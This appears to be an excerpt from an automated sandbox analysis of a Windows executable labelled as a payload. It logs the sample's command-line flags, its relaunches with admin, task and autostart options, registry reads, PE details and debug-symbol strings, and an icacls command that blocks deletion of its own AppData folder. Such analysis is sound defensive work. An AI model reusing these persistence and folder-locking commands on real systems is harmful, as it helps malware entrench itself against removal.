              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: %username%0_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: F:\0_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: --Admin2_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: IsAutoStart2_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: IsTask2_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: --ForNetRes2_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: IsAutoStart2_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: IsTask2_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: --Task2_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: --AutoStart2_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: --Service2_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: X1V2_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: --Admin2_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: x2W2_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: x*V2_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: C:\Windows\2_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: D:\Windows\2_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: 7V2_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: %username%2_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: F:\2_2_00479F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: --Admin3_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: IsAutoStart3_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: IsTask3_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: --ForNetRes3_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: IsAutoStart3_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: IsTask3_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: --Task3_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: --AutoStart3_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: --Service3_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: --Admin3_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: C:\Windows\3_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: D:\Windows\3_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: %username%3_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: F:\3_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: --Admin4_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: IsAutoStart4_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: IsTask4_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: --ForNetRes4_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: IsAutoStart4_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: IsTask4_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: --Task4_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: --AutoStart4_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: --Service4_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: --Admin4_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: C:\Windows\4_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: D:\Windows\4_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: %username%4_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: F:\4_2_00E49F90
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeString found in binary or memory: set-addPolicy
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeString found in binary or memory: setct-CertReqTBEXsetct-CertResTBEsetct-CRLNotificationTBSsetct-CRLNotificationResTBSsetct-BCIDistributionTBSsetext-genCryptgeneric cryptogramsetext-miAuthmerchant initiated authsetext-pinSecuresetext-pinAnysetext-track2setext-cvadditional verificationset-policy-rootsetCext-hashedRootsetCext-certTypesetCext-merchDatasetCext-cCertRequiredsetCext-tunnelingsetCext-setExtsetCext-setQualfsetCext-PGWYcapabilitiessetCext-TokenIdentifiersetCext-Track2DatasetCext-TokenTypesetCext-IssuerCapabilitiessetAttr-CertsetAttr-PGWYcappayment gateway capabilitiessetAttr-TokenTypesetAttr-IssCapissuer capabilitiesset-rootKeyThumbset-addPolicysetAttr-Token-EMVsetAttr-Token-B0PrimesetAttr-IssCap-CVMsetAttr-IssCap-T2setAttr-IssCap-SigsetAttr-GenCryptgrmgenerate cryptogramsetAttr-T2Encencrypted track 2setAttr-T2cleartxtcleartext track 2setAttr-TokICCsigICC or token signaturesetAttr-SecDevSigsecure device signatureset-brand-IATA-ATAset-brand-Dinersset-brand-AmericanExpressset-brand-JCBset-brand-Visaset-brand-MasterCardset-brand-NovusDES-CDMFdes-cdmfrsaOAEPEncryptionSETITU-Titu-tJOINT-ISO-ITU-Tjoint-iso-itu-tinternational-organizationsInternational OrganizationsmsSmartcardLoginMicrosoft SmartcardloginmsUPNMicrosoft Universal Principal NameAES-128-CFB1aes-128-cfb1AES-192-CFB1aes-192-cfb1AES-256-CFB1aes-256-cfb1AES-128-CFB8aes-128-cfb8AES-192-CFB8aes-192-cfb8AES-256-CFB8aes-256-cfb8DES-CFB1des-cfb1DES-CFB8des-cfb8DES-EDE3-CFB1des-ede3-cfb1DES-EDE3-CFB8des-ede3-cfb8streetstreetAddresspostalCodeid-pplproxyCertInfoProxy Certificate Informationid-ppl-anyLanguageAny languageid-ppl-inheritAllInherit allnameConstraintsX509v3 Name Constraintsid-ppl-independentIndependentRSA-SHA256sha256WithRSAEncryptionRSA-SHA384sha384WithRSAEncryptionRSA-SHA512sha512WithRSAEncryptionRSA-SHA224sha224WithRSAEncryptionSHA256sha256SHA384sha384SHA512sha512SHA224sha224identified-organizationcerticom-arcwapwap-wsgid-characteristic-two-basisonBasistpBasisppBasisc2pnb163v1c2pnb163v2c2pnb163v3c2pnb176v1c2tnb191v1c2tnb191v2c2tnb191v3c2onb191v4c2onb191v5c2pnb208w1c2tnb239v1c2tnb239v2c2tnb239v3c2onb239v4c2onb239v5c2pnb272w1c2pnb304w1c2tnb359v1c2pnb368w1c2tnb431r1secp112r1secp112r2*
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeString found in binary or memory: id-cmc-addExtensions
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile read: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55" /deny *S-1-1-0:(OI)(CI)(DE,DC)
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeProcess created: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe "C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe" --Admin IsNotAutoStart IsNotTask
              Source: unknownProcess created: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe --Task
              Source: unknownProcess created: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe "C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe" --AutoStart
              Source: unknownProcess created: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe "C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe" --AutoStart
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55" /deny *S-1-1-0:(OI)(CI)(DE,DC)Jump to behavior
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeProcess created: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe "C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeStatic file information: File size 1150976 > 1048576
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\d|#O source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2276405605.00000000032F8000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2276474116.00000000032FC000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2359865944.0000000000B1B000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2361850146.0000000000B2D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275138437.000000000388F000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2276086139.00000000038D0000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251341144.000000000388F000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275446209.00000000038BC000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2306832694.0000000003322000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2296597448.000000000331A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2307300636.000000000332B000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2306029870.0000000003322000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2296040689.000000000330C000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2298632060.0000000003322000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2307180203.0000000003323000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2378718036.0000000003C90000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\S source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2316699687.0000000003810000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2314855874.0000000003806000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2316052889.000000000380D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ate\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2314093672.0000000003AF0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error620712704.txt source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251649553.0000000003323000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251527503.000000000331A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\f source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251480244.0000000003361000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2046044060.0000000003378000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\DB\. source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2306779341.0000000003956000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2307711721.0000000003966000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb' source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251341144.000000000388F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.ppvwvMno source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251341144.0000000003813000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2370453597.000000000388E000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2366626954.0000000003839000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2369012097.0000000003839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2369942184.0000000003C21000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2362545370.0000000003C2C000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2366153323.0000000003C20000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\`F"IH source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251341144.000000000388F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2376983610.0000000003B78000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2378718036.0000000003C19000.00000004.00000020.00020000.00000000.sdmp
